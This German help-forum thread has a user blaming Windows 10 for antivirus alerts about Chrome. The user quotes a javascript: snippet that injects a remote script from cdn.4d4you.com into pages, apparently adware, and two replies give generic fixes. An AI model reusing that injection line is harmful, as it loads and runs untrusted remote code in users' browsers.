Frage von BozkurtEfkan93, 246

Amk ich rege mich langsam auf, was soll der mist mit windows 10?

Ich habe zwei probleme, seit dem ich windows 10 installiert habe und zwar ist es zu einem, dass jede min ein Fenster sich von einem Antiviren Programm öffnet und meint, dass Google Chrome eine Infektion wäre.

  1. Jedes mal wenn ich ein Manga im Internet lese, auch mit google Chrome dann passiert folgendes: javascript:var _e_=document.createElement('script');_e_.id='';_e_.src='https://cdn.4d4you.com/mmc/1.4.7/sfroot.js?mntr__vrsn=44&domain=cdn.4d4you.c... Utility&geo=DE';_e_.setAttribute('type','application/x-javascript');var _bd_=document.getElementsByTagName('body')[0]; _bd_.appendChild(_e_); .

UNd dass regt mich tierisch auf. Das passiert nur wenn ich weiter die pfeiltaste links oder rechts drücke oder wenn ich die pfeiltaste unten drücke, zum Beispiel bei Facebook oder anderen sozialen netzwerken.

Expertenantwort
von Culles, Community-Experte für Computer & Windows 10, 180

Hallo,

hast du die Ausführung von JavaScript in deinem Browser zugelassen?

 https://support.google.com/adsense/answer/12654?hl=de

LG Culles

Antwort
von xymarcoyx, 141

Hat wahrscheinlich nichts mit Windows 10 zu tun. Google Chrome löschen

CCleaner drüber laufen lassen

Google Chrome neuinstallieren

Keine passende Antwort gefunden?

Fragen Sie die Community